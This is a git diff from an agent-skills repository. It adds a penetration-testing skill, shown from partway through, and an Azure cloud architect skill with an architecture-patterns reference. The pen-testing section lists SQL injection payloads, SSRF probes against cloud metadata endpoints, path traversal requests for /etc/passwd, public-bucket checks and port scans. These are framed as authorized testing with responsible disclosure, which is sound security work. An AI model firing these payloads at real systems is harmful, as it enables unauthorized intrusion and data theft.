+' UNION SELECT 1,2,3--                    -- Find column count
+' UNION SELECT table_name,2,3 FROM information_schema.tables--
+' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
+```
+
+**Time-Based Blind:**
+```sql
+' AND IF(1=1, SLEEP(5), 0)--     -- MySQL
+' AND pg_sleep(5)--               -- PostgreSQL
+' WAITFOR DELAY '0:0:5'--        -- MSSQL
+```
+
+### SSRF Detection
+
+**Payloads for SSRF testing:**
+```
+http://127.0.0.1
+http://localhost
+http://169.254.169.254/latest/meta-data/   (AWS metadata)
+http://metadata.google.internal/            (GCP metadata)
+http://169.254.169.254/metadata/instance    (Azure metadata)
+http://[::1]                                (IPv6 localhost)
+http://0x7f000001                           (hex encoding)
+http://2130706433                           (decimal encoding)
+```
+
+### Path Traversal
+
+```
+GET /api/files?name=../../../etc/passwd
+GET /api/files?name=....//....//....//etc/passwd
+GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
+GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd  (double encoding)
+```
+
+---
+
+## Infrastructure Security
+
+### Misconfigured Cloud Storage
+
+**S3 Bucket Checks:**
+```bash
+# Check for public read access
+aws s3 ls s3://target-bucket --no-sign-request
+
+# Check bucket policy
+aws s3api get-bucket-policy --bucket target-bucket
+
+# Check ACL
+aws s3api get-bucket-acl --bucket target-bucket
+```
+
+**Common Bucket Name Patterns:**
+```
+{company}-backup, {company}-dev, {company}-staging
+{company}-assets, {company}-uploads, {company}-logs
+```
+
+### HTTP Security Headers
+
+Required headers and expected values:
+
+| Header | Expected Value |
+|--------|---------------|
+| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` |
+| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` |
+| `X-Content-Type-Options` | `nosniff` |
+| `X-Frame-Options` | `DENY` or `SAMEORIGIN` |
+| `Referrer-Policy` | `strict-origin-when-cross-origin` |
+| `Permissions-Policy` | Restrict camera, microphone, geolocation |
+| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) |
+
+### TLS Configuration
+
+```bash
+# Check TLS version and cipher suites
+nmap --script ssl-enum-ciphers -p 443 target.com
+
+# Quick check with testssl.sh
+./testssl.sh target.com
+
+# Check certificate expiry
+echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
+```
+
+**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers.
+
+### Open Port Scanning
+
+```bash
+# Quick top-1000 ports
+nmap -sV target.com
+
+# Full port scan
+nmap -p- -sV target.com
+
+# Common dangerous open ports
+# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB)
+```
+
+---
+
+## Pen Test Report Generation
+
+Generate professional reports from structured findings:
+
+```bash
+# Generate markdown report from findings JSON
+python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md
+
+# Generate JSON report
+python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
+```
+
+### Findings JSON Format
+
+```json
+[
+  {
+    "title": "SQL Injection in Login Endpoint",
+    "severity": "critical",
+    "cvss_score": 9.8,
+    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+    "category": "A03:2021 - Injection",
+    "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
+    "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
+    "impact": "Full database access, authentication bypass, potential remote code execution",
+    "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
+    "references": ["https://cwe.mitre.org/data/definitions/89.html"]
+  }
+]
+```
+
+### Report Structure
+
+1. **Executive Summary**: Business impact, overall risk level, top 3 findings
+2. **Scope**: What was tested, what was excluded, testing dates
+3. **Methodology**: Tools used, testing approach (black/gray/white box)
+4. **Findings Table**: Sorted by severity with CVSS scores
+5. **Detailed Findings**: Each with description, evidence, impact, remediation
+6. **Remediation Priority Matrix**: Effort vs. impact for each fix
+7. **Appendix**: Raw tool output, full payload lists
+
+---
+
+## Responsible Disclosure Workflow
+
+Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates.
+
+### Timeline
+
+| Day | Action |
+|-----|--------|
+| 0 | Discovery — document finding with evidence |
+| 1 | Report to vendor via security contact or bug bounty program |
+| 7 | Follow up if no acknowledgment received |
+| 30 | Request status update and remediation timeline |
+| 60 | Second follow-up — offer technical assistance |
+| 90 | Public disclosure (with or without fix, per industry standard) |
+
+### Key Principles
+
+1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage
+2. **Encrypt all communications** — PGP/GPG for email, secure channels for details
+3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts
+4. **Document everything** — timestamps, screenshots, request/response pairs
+5. **Respect the vendor's timeline** — extend deadline if they're actively working on a fix
+
+---
+
+## Workflows
+
+### Workflow 1: Quick Security Check (15 Minutes)
+
+For pre-merge reviews or quick health checks:
+
+```bash
+# 1. Generate OWASP checklist
+python scripts/vulnerability_scanner.py --target web --scope quick
+
+# 2. Scan dependencies
+python scripts/dependency_auditor.py --file package.json --severity high
+
+# 3. Check for secrets in recent commits
+# (Use gitleaks or trufflehog as described in Secret Scanning section)
+
+# 4. Review HTTP security headers
+curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
+```
+
+**Decision**: If any critical or high findings, block the merge.
+
+### Workflow 2: Full Penetration Test (Multi-Day Assessment)
+
+**Day 1 — Reconnaissance:**
+1. Map the attack surface: endpoints, authentication flows, third-party integrations
+2. Run automated OWASP checklist (full scope)
+3. Run dependency audit across all manifests
+4. Run secret scan on full git history
+
+**Day 2 — Manual Testing:**
+1. Test authentication and authorization (IDOR, BOLA, BFLA)
+2. Test injection points (SQLi, XSS, SSRF, command injection)
+3. Test business logic flaws
+4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)
+
+**Day 3 — Infrastructure and Reporting:**
+1. Check cloud storage permissions
+2. Verify TLS configuration and security headers
+3. Port scan for unnecessary services
+4. Compile findings into structured JSON
+5. Generate pen test report
+
+```bash
+# Generate final report
+python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
+```
+
+### Workflow 3: CI/CD Security Gate
+
+Automated security checks that run on every pull request:
+
+```yaml
+# .github/workflows/security-gate.yml
+name: Security Gate
+on: [pull_request]
+jobs:
+  security:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      # Secret scanning
+      - name: Scan for secrets
+        uses: trufflesecurity/trufflehog@main
+        with:
+          extra_args: --only-verified
+
+      # Dependency audit
+      - name: Audit dependencies
+        run: |
+          npm audit --audit-level=high
+          pip audit --desc
+
+      # SAST
+      - name: Static analysis
+        uses: returntocorp/semgrep-action@v1
+        with:
+          config: >-
+            p/security-audit
+            p/secrets
+            p/owasp-top-ten
+
+      # Security headers check (staging only)
+      - name: Check security headers
+        if: github.base_ref == 'staging'
+        run: |
+          curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick
+```
+
+**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.
+
+---
+
+## Anti-Patterns
+
+1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
+2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
+3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
+4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
+5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
+6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
+7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access
+8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments
+
+---
+
+## Cross-References
+
+| Skill | Relationship |
+|-------|-------------|
+| [senior-secops](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
+| [senior-security](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
+| [dependency-auditor](https://github.com/alirezarezvani/claude-skills/tree/main/engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
+| [code-reviewer](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/code-reviewer/SKILL.md) | Code review practices — includes security review checklist |
--- a/engineering-team/.claude-plugin/plugin.json
+++ b/engineering-team/.claude-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
  "name": "engineering-skills",
-  "description": "26 production-ready engineering skills: architecture, frontend, backend, fullstack, QA, DevOps, security, AI/ML, data engineering, Playwright (9 sub-skills), self-improving agent, Stripe integration, TDD guide, Google Workspace CLI, a11y audit (WCAG 2.2), and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
+  "description": "28 production-ready engineering skills: architecture, frontend, backend, fullstack, QA, DevOps, security, AI/ML, data engineering, Playwright (9 sub-skills), self-improving agent, Stripe integration, TDD guide, Google Workspace CLI, a11y audit (WCAG 2.2), Azure cloud architect, security pen testing, and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
  "version": "2.1.2",
  "author": {
    "name": "Alireza Rezvani",
--- a/engineering-team/azure-cloud-architect/SKILL.md
+++ b/engineering-team/azure-cloud-architect/SKILL.md
@@ -0,0 +1,451 @@
+---
+name: "azure-cloud-architect"
+description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure costs, set up Azure DevOps pipelines, or migrate to Azure. Covers AKS, App Service, Azure Functions, Cosmos DB, and cost optimization."
+---
+
+# Azure Cloud Architect
+
+Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates.
+
+---
+
+## Workflow
+
+### Step 1: Gather Requirements
+
+Collect application specifications:
+
+```
+- Application type (web app, mobile backend, data pipeline, SaaS, microservices)
+- Expected users and requests per second
+- Budget constraints (monthly spend limit)
+- Team size and Azure experience level
+- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001)
+- Availability requirements (SLA, RPO/RTO)
+- Region preferences (data residency, latency)
+```
+
+### Step 2: Design Architecture
+
+Run the architecture designer to get pattern recommendations:
+
+```bash
+python scripts/architecture_designer.py \
+  --app-type web_app \
+  --users 10000 \
+  --requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}'
+```
+
+**Example output:**
+
+```json
+{
+  "recommended_pattern": "app_service_web",
+  "service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"],
+  "estimated_monthly_cost_usd": 280,
+  "pros": ["Managed platform", "Built-in autoscale", "Deployment slots"],
+  "cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"]
+}
+```
+
+Select from recommended patterns:
+- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache
+- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management
+- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB
+- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs
+
+See `references/architecture_patterns.md` for detailed pattern specifications.
+
+**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
+
+### Step 3: Generate IaC Templates
+
+Create infrastructure-as-code for the selected pattern:
+
+```bash
+# Web app stack (Bicep)
+python scripts/bicep_generator.py --arch-type web-app --output main.bicep
+```
+
+**Example Bicep output (core web app resources):**
+
+```bicep
+@description('The environment name')
+param environment string = 'dev'
+
+@description('The Azure region for resources')
+param location string = resourceGroup().location
+
+@description('The application name')
+param appName string = 'myapp'
+
+// App Service Plan
+resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
+  name: '${environment}-${appName}-plan'
+  location: location
+  sku: {
+    name: 'P1v3'
+    tier: 'PremiumV3'
+    capacity: 1
+  }
+  properties: {
+    reserved: true // Linux
+  }
+}
+
+// App Service
+resource appService 'Microsoft.Web/sites@2023-01-01' = {
+  name: '${environment}-${appName}-web'
+  location: location
+  properties: {
+    serverFarmId: appServicePlan.id
+    httpsOnly: true
+    siteConfig: {
+      linuxFxVersion: 'NODE|20-lts'
+      minTlsVersion: '1.2'
+      ftpsState: 'Disabled'
+      alwaysOn: true
+    }
+  }
+  identity: {
+    type: 'SystemAssigned'
+  }
+}
+
+// Azure SQL Database
+resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
+  name: '${environment}-${appName}-sql'
+  location: location
+  properties: {
+    administrators: {
+      azureADOnlyAuthentication: true
+    }
+    minimalTlsVersion: '1.2'
+  }
+}
+
+resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
+  parent: sqlServer
+  name: '${appName}-db'
+  location: location
+  sku: {
+    name: 'GP_S_Gen5_2'
+    tier: 'GeneralPurpose'
+  }
+  properties: {
+    autoPauseDelay: 60
+    minCapacity: json('0.5')
+  }
+}
+```
+
+> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`.
+
+**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft.
+
+### Step 4: Review Costs
+
+Analyze estimated costs and optimization opportunities:
+
+```bash
+python scripts/cost_optimizer.py \
+  --config current_resources.json \
+  --json
+```
+
+**Example output:**
+
+```json
+{
+  "current_monthly_usd": 2000,
+  "recommendations": [
+    { "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" },
+    { "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" },
+    { "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" }
+  ],
+  "total_potential_savings_usd": 735
+}
+```
+
+Output includes:
+- Monthly cost breakdown by service
+- Right-sizing recommendations
+- Reserved Instance and Savings Plan opportunities
+- Potential monthly savings
+
+### Step 5: Configure CI/CD
+
+Set up Azure DevOps Pipelines or GitHub Actions with Azure:
+
+```yaml
+# GitHub Actions — deploy Bicep to Azure
+name: Deploy Infrastructure
+on:
+  push:
+    branches: [main]
+
+permissions:
+  id-token: write
+  contents: read
+
+jobs:
+  deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - uses: azure/login@v2
+        with:
+          client-id: ${{ secrets.AZURE_CLIENT_ID }}
+          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
+          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
+
+      - uses: azure/arm-deploy@v2
+        with:
+          resourceGroupName: rg-myapp-dev
+          template: ./infra/main.bicep
+          parameters: environment=dev
+```
+
+```yaml
+# Azure DevOps Pipeline
+trigger:
+  branches:
+    include:
+      - main
+
+pool:
+  vmImage: 'ubuntu-latest'
+
+steps:
+  - task: AzureCLI@2
+    inputs:
+      azureSubscription: 'MyServiceConnection'
+      scriptType: 'bash'
+      scriptLocation: 'inlineScript'
+      inlineScript: |
+        az deployment group create \
+          --resource-group rg-myapp-dev \
+          --template-file infra/main.bicep \
+          --parameters environment=dev
+```
+
+### Step 6: Security Review
+
+Validate security posture before production:
+
+- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code
+- **Secrets**: Key Vault for all secrets, certificates, and connection strings
+- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF
+- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest
+- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails
+- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives
+
+**If deployment fails:**
+
+1. Check the deployment status:
+   ```bash
+   az deployment group show \
+     --resource-group rg-myapp-dev \
+     --name main \
+     --query 'properties.error'
+   ```
+2. Review Activity Log for RBAC or policy errors.
+3. Validate the Bicep template before deploying:
+   ```bash
+   az bicep build --file main.bicep
+   az deployment group validate \
+     --resource-group rg-myapp-dev \
+     --template-file main.bicep
+   ```
+
+**Common failure causes:**
+- RBAC permission errors — verify the deploying principal has Contributor on the resource group
+- Resource provider not registered — run `az provider register --namespace Microsoft.Web`
+- Naming conflicts — Azure resource names are often globally unique (storage accounts, web apps)
+- Quota exceeded — request quota increase via Azure Portal > Subscriptions > Usage + quotas
+
+---
+
+## Tools
+
+### architecture_designer.py
+
+Generates architecture pattern recommendations based on requirements.
+
+```bash
+python scripts/architecture_designer.py \
+  --app-type web_app \
+  --users 50000 \
+  --requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \
+  --json
+```
+
+**Input:** Application type, expected users, JSON requirements
+**Output:** Recommended pattern, service stack, cost estimate, pros/cons
+
+### cost_optimizer.py
+
+Analyzes Azure resource configurations for cost savings.
+
+```bash
+python scripts/cost_optimizer.py --config resources.json --json
+```
+
+**Input:** JSON file with current Azure resource inventory
+**Output:** Recommendations for:
+- Idle resource removal
+- VM and database right-sizing
+- Reserved Instance purchases
+- Storage tier transitions
+- Unused public IPs and load balancers
+
+### bicep_generator.py
+
+Generates Bicep template scaffolds from architecture type.
+
+```bash
+python scripts/bicep_generator.py --arch-type microservices --output main.bicep
+```
+
+**Output:** Production-ready Bicep templates with:
+- Managed Identity (no passwords)
+- Key Vault integration
+- Diagnostic settings for Azure Monitor
+- Network security groups
+- Tags for cost allocation
+
+---
+
+## Quick Start
+
+### Web App Architecture (< $100/month)
+
+```
+Ask: "Design an Azure web app for a startup with 5000 users"
+
+Result:
+- App Service (B1 Linux) for the application
+- Azure SQL Serverless for relational data
+- Azure Blob Storage for static assets
+- Front Door (free tier) for CDN and routing
+- Key Vault for secrets
+- Estimated: $40-80/month
+```
+
+### Microservices on AKS ($500-2000/month)
+
+```
+Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users"
+
+Result:
+- AKS cluster with 3 node pools (system, app, jobs)
+- API Management for gateway and rate limiting
+- Cosmos DB for multi-model data
+- Service Bus for async messaging
+- Azure Monitor + Application Insights for observability
+- Multi-zone deployment
+```
+
+### Serverless Event-Driven (< $200/month)
+
+```
+Ask: "Design an event-driven backend for processing orders"
+
+Result:
+- Azure Functions (Consumption plan) for compute
+- Event Grid for event routing
+- Service Bus for reliable messaging
+- Cosmos DB for order data
+- Application Insights for monitoring
+- Estimated: $30-150/month depending on volume
+```
+
+### Data Pipeline ($300-1500/month)
+
+```
+Ask: "Design a data pipeline for ingesting 10M events/day"
+
+Result:
+- Event Hubs for ingestion
+- Stream Analytics or Functions for processing
+- Data Lake Storage Gen2 for raw data
+- Synapse Analytics for warehouse
+- Power BI for dashboards
+```
+
+---
+
+## Input Requirements
+
+Provide these details for architecture design:
+
+| Requirement | Description | Example |
+|-------------|-------------|---------|
+| Application type | What you're building | SaaS platform, mobile backend |
+| Expected scale | Users, requests/sec | 10k users, 100 RPS |
+| Budget | Monthly Azure limit | $500/month max |
+| Team context | Size, Azure experience | 3 devs, intermediate |
+| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
+| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
+
+**JSON Format:**
+
+```json
+{
+  "application_type": "saas_platform",
+  "expected_users": 10000,
+  "requests_per_second": 100,
+  "budget_monthly_usd": 500,
+  "team_size": 3,
+  "azure_experience": "intermediate",
+  "compliance": ["SOC2"],
+  "availability_sla": "99.9%"
+}
+```
+
+---
+
+## Anti-Patterns
+
+| Anti-Pattern | Why It Fails | Do This Instead |
+|---|---|---|
+| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax |
+| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings |
+| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs |
+| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration |
+| Over-provisioning "just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly |
+| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload |
+| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name |
+| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively |
+
+---
+
+## Output Formats
+
+### Architecture Design
+
+- Pattern recommendation with rationale
+- Service stack diagram (ASCII)
+- Monthly cost estimate and trade-offs
+
+### IaC Templates
+
+- **Bicep**: Recommended — first-party, module support, clean syntax
+- **ARM JSON**: Generated from Bicep when needed
+- **Terraform HCL**: Multi-cloud compatible using azurerm provider
+
+### Cost Analysis
+
+- Current spend breakdown with optimization recommendations
+- Priority action list (high/medium/low) and implementation checklist
+
+---
+
+## Reference Documentation
+
+| Document | Contents |
+|----------|----------|
+| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region |
+| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking |
+| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR |
--- a/engineering-team/azure-cloud-architect/references/architecture_patterns.md
+++ b/engineering-team/azure-cloud-architect/references/architecture_patterns.md
@@ -0,0 +1,413 @@
+# Azure Architecture Patterns
+
+Reference guide for selecting the right Azure architecture pattern based on application requirements.
+
+---
+
+## Table of Contents
+
+- [Pattern Selection Matrix](#pattern-selection-matrix)
+- [Pattern 1: App Service Web Application](#pattern-1-app-service-web-application)
+- [Pattern 2: Microservices on AKS](#pattern-2-microservices-on-aks)
+- [Pattern 3: Serverless Event-Driven](#pattern-3-serverless-event-driven)
+- [Pattern 4: Data Pipeline](#pattern-4-data-pipeline)
+- [Pattern 5: Multi-Region Active-Active](#pattern-5-multi-region-active-active)
+- [Well-Architected Framework Alignment](#well-architected-framework-alignment)
+
+---
+
+## Pattern Selection Matrix
+
+| Pattern | Best For | Users | Monthly Cost | Complexity |
+|---------|----------|-------|--------------|------------|
+| App Service Web | MVPs, SaaS, APIs | <100K | $50-500 | Low |
+| Microservices on AKS | Complex platforms, multi-team | Any | $500-5000 | High |
+| Serverless Event-Driven | Event processing, webhooks, APIs | <1M | $20-500 | Low-Medium |
+| Data Pipeline | Analytics, ETL, ML | Any | $200-3000 | Medium-High |
+| Multi-Region Active-Active | Global apps, 99.99% uptime | >100K | 1.5-2x single | High |
+
+---
+
+## Pattern 1: App Service Web Application
+
+### Architecture
+
+```
+                    ┌──────────────┐
+                    │  Azure Front │
+                    │    Door      │
+                    │  (CDN + WAF) │
+                    └──────┬───────┘
+                           │
+                    ┌──────▼───────┐
+                    │  App Service │
+                    │  (Linux P1v3)│
+                    │  + Slots     │
+                    └──┬───────┬───┘
+                       │       │
+              ┌────────▼──┐ ┌──▼────────┐
+              │ Azure SQL  │ │  Blob     │
+              │ Serverless │ │  Storage  │
+              └────────────┘ └───────────┘
+                       │
+              ┌────────▼──────────┐
+              │  Key Vault        │
+              │  (secrets, certs) │
+              └───────────────────┘
+```
+
+### Services
+
+| Service | Purpose | Configuration |
+|---------|---------|---------------|
+| Azure Front Door | Global CDN, WAF, SSL | Standard or Premium tier, custom domain |
+| App Service | Web application hosting | Linux P1v3 (production), B1 (dev) |
+| Azure SQL Database | Relational database | Serverless GP_S_Gen5_2 with auto-pause |
+| Blob Storage | Static assets, uploads | Hot tier with lifecycle policies |
+| Key Vault | Secrets management | RBAC authorization, soft-delete enabled |
+| Application Insights | Monitoring and APM | Workspace-based, connected to Log Analytics |
+| Entra ID | Authentication | Easy Auth or MSAL library |
+
+### Deployment Strategy
+
+- **Deployment slots**: staging slot for zero-downtime deploys, swap to production after validation
+- **Auto-scale**: CPU-based rules, 1-10 instances in production
+- **Health checks**: `/health` endpoint monitored by App Service and Front Door
+
+### Cost Estimate
+
+| Component | Dev | Production |
+|-----------|-----|-----------|
+| App Service | $13 (B1) | $75 (P1v3) |
+| Azure SQL | $5 (Basic) | $40-120 (Serverless GP) |
+| Front Door | $0 (disabled) | $35-55 |
+| Blob Storage | $1 | $5-15 |
+| Key Vault | $0.03 | $1-5 |
+| Application Insights | $0 (free tier) | $5-20 |
+| **Total** | **~$19** | **~$160-290** |
+
+---
+
+## Pattern 2: Microservices on AKS
+
+### Architecture
+
+```
+                    ┌──────────────┐
+                    │  Azure Front │
+                    │    Door      │
+                    └──────┬───────┘
+                           │
+                    ┌──────▼───────┐
+                    │  API Mgmt    │
+                    │  (gateway)   │
+                    └──────┬───────┘
+                           │
+              ┌────────────▼────────────┐
+              │        AKS Cluster       │
+              │ ┌───────┐ ┌───────┐     │
+              │ │ svc-A │ │ svc-B │     │
+              │ └───┬───┘ └───┬───┘     │
+              │     │         │          │
+              │ ┌───▼─────────▼───┐     │
+              │ │   Service Bus    │     │
+              │ │   (async msgs)   │     │
+              │ └─────────────────┘     │
+              └─────────────────────────┘
+                       │        │
+              ┌────────▼──┐ ┌──▼────────┐
+              │ Cosmos DB  │ │  ACR      │
+              │ (data)     │ │ (images)  │
+              └────────────┘ └───────────┘
+```
+
+### Services
+
+| Service | Purpose | Configuration |
+|---------|---------|---------------|
+| AKS | Container orchestration | 3 node pools: system (D2s_v5), app (D4s_v5), jobs (spot) |
+| API Management | API gateway, rate limiting | Standard v2 or Consumption tier |
+| Cosmos DB | Multi-model database | Session consistency, autoscale RU/s |
+| Service Bus | Async messaging | Standard tier, topics for pub/sub |
+| Container Registry | Docker image storage | Basic (dev), Standard (prod) |
+| Key Vault | Secrets for pods | CSI driver + workload identity |
+| Azure Monitor | Cluster and app observability | Container Insights + App Insights |
+
+### AKS Best Practices
+
+**Node Pools:**
+- System pool: 2-3 nodes, D2s_v5, taints for system pods only
+- App pool: 2-10 nodes (autoscaler), D4s_v5, for application workloads
+- Jobs pool: spot instances, for batch processing and CI runners
+
+**Networking:**
+- Azure CNI for VNet-native pod networking
+- Network policies (Azure or Calico) for pod-to-pod isolation
+- Ingress via NGINX Ingress Controller or Application Gateway Ingress Controller (AGIC)
+
+**Security:**
+- Workload Identity for pod-to-Azure service auth (replaces pod identity)
+- Azure Policy for Kubernetes (OPA Gatekeeper)
+- Defender for Containers for runtime threat detection
+- Private cluster for production (API server not exposed to internet)
+
+**Deployment:**
+- Helm charts for application packaging
+- Flux or ArgoCD for GitOps
+- Horizontal Pod Autoscaler (HPA) + KEDA for event-driven scaling
+
+### Cost Estimate
+
+| Component | Dev | Production |
+|-----------|-----|-----------|
+| AKS nodes (system) | $60 (1x D2s_v5) | $180 (3x D2s_v5) |
+| AKS nodes (app) | $120 (1x D4s_v5) | $360 (3x D4s_v5) |
+| API Management | $0 (Consumption) | $175 (Standard v2) |
+| Cosmos DB | $25 (serverless) | $100-400 (autoscale) |
+| Service Bus | $10 | $10-50 |
+| Container Registry | $5 | $20 |
+| Monitoring | $0 | $50-100 |
+| **Total** | **~$220** | **~$900-1300** |
+
+---
+
+## Pattern 3: Serverless Event-Driven
+
+### Architecture
+
+```
+    ┌──────────┐     ┌──────────┐     ┌──────────┐
+    │ HTTP     │     │ Blob     │     │ Timer    │
+    │ Trigger  │     │ Trigger  │     │ Trigger  │
+    └────┬─────┘     └────┬─────┘     └────┬─────┘
+         │                │                 │
+         └────────┬───────┘─────────┬───────┘
+                  │                 │
+           ┌──────▼───────┐ ┌──────▼───────┐
+           │    Azure     │ │    Azure     │
+           │  Functions   │ │  Functions   │
+           │  (handlers)  │ │  (workers)   │
+           └──┬────┬──────┘ └──────┬───────┘
+              │    │               │
+    ┌─────────▼┐ ┌─▼──────────┐ ┌─▼──────────┐
+    │ Event    │ │ Service    │ │ Cosmos DB  │
+    │ Grid     │ │ Bus Queue  │ │ (data)     │
+    │ (fanout) │ │ (reliable) │ │            │
+    └──────────┘ └────────────┘ └────────────┘
+```
+
+### Services
+
+| Service | Purpose | Configuration |
+|---------|---------|---------------|
+| Azure Functions | Event handlers, APIs | Consumption plan (dev), Premium (prod) |
+| Event Grid | Event routing and fan-out | System + custom topics |
+| Service Bus | Reliable messaging with DLQ | Basic or Standard, queues + topics |
+| Cosmos DB | Low-latency data store | Serverless (dev), autoscale (prod) |
+| Blob Storage | File processing triggers | Lifecycle policies |
+| Application Insights | Function monitoring | Sampling at 5-10% for high volume |
+
+### Durable Functions Patterns
+
+Use Durable Functions for orchestration instead of building custom state machines:
+
+| Pattern | Use Case | Example |
+|---------|----------|---------|
+| Function chaining | Sequential steps | Order: validate -> charge -> fulfill -> notify |
+| Fan-out/fan-in | Parallel processing | Process all images in a batch, aggregate results |
+| Async HTTP APIs | Long-running operations | Start job, poll for status, return result |
+| Monitor | Periodic polling | Check external API until condition met |
+| Human interaction | Approval workflows | Send approval email, wait for response with timeout |
+
+### Cost Estimate
+
+| Component | Dev | Production |
+|-----------|-----|-----------|
+| Functions (Consumption) | $0 (1M free) | $5-30 |
+| Event Grid | $0 | $0-5 |
+| Service Bus | $0 (Basic) | $10-30 |
+| Cosmos DB | $0 (serverless free tier) | $25-150 |
+| Blob Storage | $1 | $5-15 |
+| Application Insights | $0 | $5-15 |
+| **Total** | **~$1** | **~$50-245** |
+
+---
+
+## Pattern 4: Data Pipeline
+
+### Architecture
+
+```
+    ┌──────────┐     ┌──────────┐
+    │ IoT/Apps │     │ Batch    │
+    │ (events) │     │ (files)  │
+    └────┬─────┘     └────┬─────┘
+         │                │
+    ┌────▼─────┐     ┌────▼─────┐
+    │ Event    │     │ Data     │
+    │ Hubs     │     │ Factory  │
